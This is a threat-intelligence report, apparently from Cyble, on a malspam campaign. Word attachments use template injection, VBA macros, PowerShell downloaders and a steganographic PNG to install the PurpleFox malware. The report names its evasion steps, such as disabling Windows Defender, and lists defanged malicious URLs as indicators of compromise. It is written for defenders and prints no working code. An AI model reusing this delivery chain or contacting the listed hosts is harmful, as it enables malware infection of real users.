- Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.
- In this malspam campaign, a VBA macro is employed to fetch the initial stage PowerShell script payload.
- The initial stage PowerShell script functions as a downloader responsible for retrieving a PNG image that conceals hidden content using a form of steganography technique.
- A code extracted from the PNG image serves as a second-stage PowerShell script, also acting as a downloader. This script retrieves an MSI payload from a server, which is disguised as a JPG file.
- The MSI installer payload is the PurpleFox malware, which carries out malicious activities on the victim’s system.
On September 25th, CRIL encountered an intriguing Microsoft Word document named “Invoice-891920.docx” on VirusTotal. Subsequent investigation revealed that it employs a novel approach to deliver the malware known as “PurpleFox.”
PurpleFox, in operation since March 2018, is a formidable and malicious tool. It harnesses rootkit elements to elude detection by concealing registry keys and files on the compromised system. The core objective of PurpleFox is to disseminate additional malware onto the systems it manages to infiltrate.
During our further investigation, we came across a Twitter post by researcher @bomccss, in which they have confirmed a small number of Japanese emails containing malware attachments named as “ID-191304203986.docm.” This attachment serves as a means to propagate the PurpleFox malware with the same technique.
This technique begins with the initial stage of sending a spam email containing a Word file attachment. When the recipient opens the Word document, it initiates the download of another document file from a remote server. This file employs a VBA macro to fetch the first stage of PowerShell code. Subsequently, the PowerShell script is activated, fetching a PNG image containing concealed data through steganography.
Once the hidden content is extracted and decoded from the PNG image, it triggers the execution of a Second Stage PowerShell Script, which proceeds to download an MSI installer from a server that is disguised as a JPG file. This MSI installer file operates as a payload of the PurpleFox malware, as illustrated in the figure below.
The initial infection starts with a spam email that includes a Word attachment with filenames like the following:
The emails include an attached Word document file, which can be in formats such as .doc, .docx, or .docm, and it contains an embedded URL within the document. To access this content, users are required to open the document and click “Enable Content,” as depicted below.
After clicking the “Enable Content” button, the file “Invoice-891920.docx” proceeds to retrieve another document file named “update.dotm” from a URL and executes it. The URL is present in the XML file named “settings.xml.rels,” which is located in the directory “\word\_rels” within the extracted “Invoice-891920.docx” file.
The figure below shows the content of the “settings.xml.rels” file.
Inside the Microsoft Word document template file “update.dotm,” there is an embedded VBA macro content stored in a binary file named “vbaProject.bin,” as shown below.
When this macro content is executed successfully, it triggers the execution of a PowerShell script that runs a base64 encoded data. This encoded data is used to download a JPG file named “ace.jpg” from a remote server (shown below) and execute it.
The following figure displays the macro content within the document file, which contains the PowerShell script with the “DownloadString” function after decoding.
The file named “ace.jpg” pretends to be a JPG image file, but in reality, it is a PowerShell script that contains a base64 encoded string. This encoded content functions as a downloader for the first stage of a PowerShell script, as shown in the figure below.
First Stage PowerShell Script (Steganography)
The purpose of the code present in the first stage PowerShell script is to perform some form of image processing and then execute a PowerShell script obtained from the processed image.
Upon execution, the first stage PowerShell script downloads a PNG image named “all.png” from the below URL and then processes the pixel data of that image. It manipulates the color information of each pixel and stores the results in an array. After processing the image, the script converts the processed data into a string using ASCII encoding. The converted string is then executed as a command using “invoke-expression.”
In this scenario, manipulating pixel data in a particular way to conceal information or a command within an image represents a type of steganography.
The highlighted code in the figure depicts a nested loop structure used for the purpose of processing each individual pixel within an image. This code processes each pixel of an image by extracting and combining specific bits from the blue and green color components and then storing the result in an array. Subsequently, the array is converted into a string, with the intention of invoking it for further operations.
The figure below displays an image named “all.png,” which conceals hidden information within it, representing the next stage of a PowerShell script.
Second Stage PowerShell Script
The image below displays the PowerShell script that has been extracted from the PNG image.
Upon execution of the second-stage PowerShell script, it performs the following actions:
- Disabling real-time monitoring in Windows Defender
- Creating an exclusion for the Windows directory
- Continuously attempts to download and install an MSI package from the following URL until it identifies a specific registry key and its associated value.
Within the PowerShell script, there is a C# code snippet enclosed between “@” and “@”. This snippet imports the “msi.dll” library and establishes two functions from it: MsiInstallProduct and MsiSetInternalUI. These functions are utilized to handle the installation of MSI packages and configure the internal user interface level.
Inside the script, there’s a loop that continues until it successfully fetches a registry value named “StayOnTop” with data “1” in the HKCU\Software\7-Zip registry key. This method is used to ascertain the successful execution of the payload. It repeatedly attempts to install the MSI package until it identifies this specific registry item.
The following image displays the content of the second-stage PowerShell script after it has been decoded from base64.
The file named “SsdxxIp8DqeQ.jpg” downloaded from the server is an MSI installer file disguised as a JPG file. It is dropped and executed in the location of “C:\Windows\Installer\MSI7417.tmp” and has been identified as “PurpleFox” malware.
The figure below depicts the process tree of a PurpleFox deployment originating from a Microsoft Word document received via a spam email.
PurpleFox is a multifaceted malware downloader that specializes in propagating other malware files. It primarily infiltrates systems to distribute cryptocurrency mining software. Notably, it operates as a fileless rootkit and backdoor trojan. This malware strain was discovered in 2018 and has since played a role in various cyber campaigns, delivering ransomware, spyware, and cryptocurrency mining applications. Its primary targets are the Windows operating system, and it commandeers compromised devices to act as hosts for its operations.
After examining the MSI payload, it became apparent that it contains three packaged files that are set to be dropped upon execution, specifically “sysupdate.log”, “winupdate32.log,” and “winupdate64.log.” The figure below shows the files extracted from the MSI payload.
While execution, the MSI payload copies either “winupdate32.log” or “winupdate64.log” into the C:\Windows directory, depending on whether the operating system is 32-bit or 64-bit. Despite their file extension being .log, both of these copied files are, in reality, 32-bit and 64-bit PE DLL files, respectively. These DLLs are specially packed with VMprotect to deter any attempts at debugging or analysis within virtual machine environments. Meanwhile, the third file, sysupdate.log, consistently drops in the Windows folder, irrespective of the OS version.
As part of the execution process, these DLL files undergo renaming and sideloading, enabling them to carry out the malicious activities orchestrated by PurpleFox. The figure below shows the process tree of the PurpleFox infection.
PurpleFox malware is a highly sophisticated and malicious strain known for its diverse capabilities. It spreads through exploit kits, exploiting Windows vulnerabilities, and can execute in a fileless manner, making it challenging to detect. Once a system is compromised, it becomes part of a botnet, enabling remote control for various malicious purposes, including data theft and Distributed Denial-of-Service (DDoS) attacks. Purple Fox exhibits polymorphic code, constantly changing its appearance to evade signature-based antivirus solutions. It employs anti-detection techniques, propagates within networks, establishes persistence, and, in some versions, even possesses rootkit-like capabilities.
Spam emails with document attachments continue to be a preferred tactic for threat actors, primarily due to their high success rate in reaching a broad range of potential targets while also bypassing initial security measures. In a current campaign, threat actors have adopted the use of spam emails that include Microsoft Word attachments as the starting point for their operations. The initial VBA macro, activated through these attachments, employs PowerShell to fetch what appears to be a harmless PNG image. However, this image actually conceals the subsequent PowerShell script in a hidden manner, employing steganography techniques to remain undetected.
This sophisticated strategy is designed to avoid detection, maintain persistence, and maximize their success in compromising systems and networks. Furthermore, the final phase involves the deployment of a PurpleFox malware payload. The administrators of the Purple Fox remain active and consistently enhance their collection of new malware while also improving the existing malware versions they possess. The utilization of these tactics highlights the complexity of contemporary cyber threats, underscoring the importance of robust cybersecurity protocols, user awareness, and pre-emptive defense strategies to protect against ever-changing attack methods.
- The initial compromise takes place through spam emails. As a result, it’s recommended to implement robust email filtering solutions to detect and thwart the distribution of malicious attachments.
- When handling email attachments, particularly those from unknown senders, exercising caution is crucial. Verify the sender’s identity, particularly if an email seems suspicious.
- To enhance protection against potential threats, configure your Office software to have macros disabled as the default setting, enabling them only for trusted documents.
- Enhancing security by enforcing policies and restrictions to prevent unauthorized PowerShell script execution.
- Keep the operating system, software, and applications up to date with the latest security patches and updates. Malware often targets known vulnerabilities.
- Deploy strong antivirus and anti-malware solutions to detect and remove malicious executables and scripts.
MITRE ATT&CK® Techniques
|Initial Access (TA0001)||Phishing (T1566.001)||This malware reaches users via spam emails.|
|Execution (TA0002)||Command and Scripting Interpreter: Visual Basic (T1059.005)||Document contains embedded VBA macros, which|
executes code when the document is opened.
|Execution (TA0002)||Command and Scripting|
|PowerShell commands are used to download the next stage payload.|
|Persistence (TA0003)||Windows Service|
|Uses sc.exe to modify the status of services.|
|Defense Evasion (TA0005)||Virtualization/Sandbox Evasion (T1497)||Performing Anti-VM/Anti-Debug technique|
|Defense Evasion (TA0005)||Disable or Modify Tools|
|The malware scans for VM and Debugger-|
related processes and terminates them.
|Defense Evasion (TA0005)||Masquerading (T1036.008)||Download files with a non-matching file extension|
(content does not match to file extension).
|Defense Evasion (TA0005)||Modify Registry (T1112)||Uses reg.exe to modify the Windows registry.|
|Defense Evasion (TA0005)||Template Injection (T1221)||The sample has suspicious references in Office|
document templates to conceal malicious code or
force authentication attempts.
|Defense Evasion (TA0005)||Services File Permissions|
|Uses cacls to modify the permissions of files.|
|Discovery (TA0007)||Process Discovery (T1057)||Queries a list of all running processes.|
|Discovery (TA0007)||Query Registry (T1012)||The malware is examining the registry to|
extract system details.
|Discovery (TA0007)||System Information|
|The malware gathers system information through PowerShell, Command Prompt|
(cmd), and WMIC.
|Discovery (TA0007)||Security Software|
|May try to detect the virtual machine to hinder|
analysis (VM artifact strings found in memory).
|Application Layer Protocol|
|The malware uses TCP to interact|
with the C&C server.
|Ingress Tool Transfer|
|The malware has the ability to download|
files from C&C
Indicators of Compromise (IOCs)
|SsdxxIp8DqeQ.jpg (MSI file) – PurpleFox malware|
|hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/zKJFnbnzeum8/67856eed42115b6af39ecf6bb3e66f6ed8c13287/update[.]dotm||URL||URL of Template injection|
|hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace[.]jpg||URL||1st stage PowerShell|
|hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all[.]png||URL||PNG image contains 2nd stage PowerShell Script using steganography|
|hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ[.]jpg||URL||PurpleFox payload, MSI file disguised as JPG|